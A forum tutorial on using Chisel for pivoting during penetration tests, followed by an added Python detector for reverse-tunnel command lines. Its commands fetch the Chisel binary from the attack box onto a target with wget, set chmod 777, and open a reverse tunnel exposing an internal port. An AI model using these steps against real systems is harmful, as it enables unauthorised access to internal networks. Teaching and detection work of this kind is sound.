A Detailed Guide on Chisel Part 1

Gauloran

Senior Moderator
7 Jul 2013
Port forwarding background
Port forwarding in computer networks, also known as network address translation (NAT) port mapping, redirects communication requests from one combination of address and port number to another while packets traverse a network gateway such as a firewall or router. It is used to keep unwanted traffic out. The network administrator uses one IP address for all external communication over the Internet while dedicating multiple internal servers with different IPs and ports to perform different tasks, depending on the requirements of the organization.



Content
Code:
Introduction to Chisel
Establish a connection to a remote server
Local port forwarding example - 1
Local port forwarding example - 2
Establishing a connection with a SOCKS5 proxy
Configure SOCKS5 in the file proxychains4.conf
Capture remote server banners with proxychains
Connect Telnet using proxychains
FTP connection using proxychains
Connect VNC Viewer using proxychains
Conclusion

Introduction to Chisel
Chisel is an open source tool written in Go (Golang), mainly useful for bypassing firewalls, although it can also be used to provide a secure endpoint into your network. It is a fast TCP/UDP tunnel, transported over HTTP and secured via SSH. Two components are required to establish a connection between the remote server and the attack box: the attack box acts as the Chisel server and the remote server as the Chisel client.

Establish a connection to a remote server
We establish a connection to the remote server using valid credentials. The remote server can be both the target and the tunneling point for the next leg: if there is another hop that we can connect to, the remote server acts as a routing point. We logged in to the host as the pentest user over SSH (Secure Shell), which transmits data in encrypted form. After connecting to the remote server, we display the status of the internal network with the following commands. The netstat options used are:

-a show all sockets
-n show numeric addresses
-t show TCP connections
-p show process ID/name

Code:
ssh pentest@<remote-server-ip>
netstat -antp


Installation

Installing Chisel on Kali Linux is straightforward because it is available as a distribution package. We can install it with the command below.

Code:
apt install chisel


Local port forwarding Example – 1

Reverse port forwarding allows connection to remote services hosted in the internal network. Here we use the Chisel utility to achieve our goal, which takes several steps. First, we configure the reverse server on our base machine (Kali), specifying the port number as 5000.



Once our Chisel server is ready and reverse tunneling enabled, we will need to transfer the Chisel binary to the remote server. Chisel binaries can be downloaded from the official repositories depending on the system architecture. All the latest available binaries can be found by going to the releases tab. Since we will be testing it on a Linux system with AMD64 architecture, we have chosen the marked system.

Download link: Releases · jpillora/chisel



After cloning, the archive is saved in the download folder in compressed (.gz) format. Next, we extract the file using the gunzip utility. As mentioned earlier, we need to push it to the target system to set up Chisel as a client. For file transfer, we have configured a Python HTTP server on our local system which hosts our files on port 80.

Code:
git clone https://github.com/jpillora/chisel.git
# extract the release binary
gunzip chisel_1.7.7_linux_amd64.gz
# serve the current directory over HTTP on port 80
python3 -m http.server 80




We uploaded the Chisel binary to the /tmp directory of the remote server, where every user has full permissions on files. Then we give the file full permissions so that we can run it. If we do not set the permission, we cannot run it, because a file uploaded to the temp folder as a low-privileged user is only given read permission. To establish a remote connection we need a Chisel server and a Chisel client, where the Chisel server is the attack box and the Chisel client is the target machine. Since we previously configured the Chisel server on port 5000, we connect to that server. In this example we run Chisel as a client and provide the IP address and port number of the server (5000). We then specify an access port and localhost with the port where the HTTP service is hosted internally on the remote system.

Code:
wget 192.168.1.205/chisel_1.7.7_linux_amd64
chmod 777 chisel_1.7.7_linux_amd64
./chisel_1.7.7_linux_amd64 client 192.168.68.141:5000 R:4444:localhost:8080



A Detailed Guide on Chisel Part 2
A Detailed Guide on Chisel Part 3
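
A defender-side view of the client command above, added here as an example that is not part of the original post or of Chisel's own code: it parses the `R:` remote syntax and flags process command lines that request a reverse tunnel. The function names, the renamed-binary path and the 10.0.0.7 address are constructed for illustration; only the host:port remote forms are handled, and no value-taking flags are assumed after `client`.

```python
import re
import shlex

# Subset of chisel's remote syntax: [R:][local-host:]local-port:remote-host:remote-port
REMOTE_RE = re.compile(
    r"^(?P<rev>R:)?(?:(?P<lhost>[^:]+):)?(?P<lport>\d+):(?P<rhost>[^:]+):(?P<rport>\d+)$"
)

def parse_remote(spec):
    """Parse one remote spec; return None if it is not in the supported subset."""
    m = REMOTE_RE.match(spec)
    if not m:
        return None
    return {
        "reverse": m["rev"] is not None,
        # chisel documents 0.0.0.0 (all interfaces) as the default local host
        "listen_host": m["lhost"] or "0.0.0.0",
        "listen_port": int(m["lport"]),
        "target": f'{m["rhost"]}:{m["rport"]}',
    }

def find_reverse_tunnels(cmdlines):
    """Flag '<binary> client <server> <remote>...' command lines carrying an R: remote.

    Matching on argument shape rather than the binary name still works when the
    binary has been renamed. Assumes no value-taking flags follow 'client'.
    """
    findings = []
    for line in cmdlines:
        argv = shlex.split(line)
        if "client" not in argv:
            continue
        args = [a for a in argv[argv.index("client") + 1:] if not a.startswith("-")]
        if len(args) < 2:
            continue
        for spec in args[1:]:
            remote = parse_remote(spec)
            if remote and remote["reverse"]:
                findings.append({"cmdline": line, "server": args[0], **remote})
    return findings

# Constructed sample process command lines; only the first is taken from the page.
SAMPLE_CMDLINES = [
    "./chisel_1.7.7_linux_amd64 client 192.168.68.141:5000 R:4444:localhost:8080",
    "/tmp/updater client 192.168.68.141:5000 R:127.0.0.1:2222:10.0.0.7:22",
    "./chisel_1.7.7_linux_amd64 client 192.168.68.141:5000 3000:10.0.0.7:80",
    "python3 -m http.server 80",
]

if __name__ == "__main__":
    for f in find_reverse_tunnels(SAMPLE_CMDLINES):
        print(f'{f["server"]} listens on {f["listen_host"]}:{f["listen_port"]} -> {f["target"]}')
```

For the page's command, the result shows that the Chisel server opens port 4444 on all interfaces and relays it to port 8080 on the client host's loopback.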



 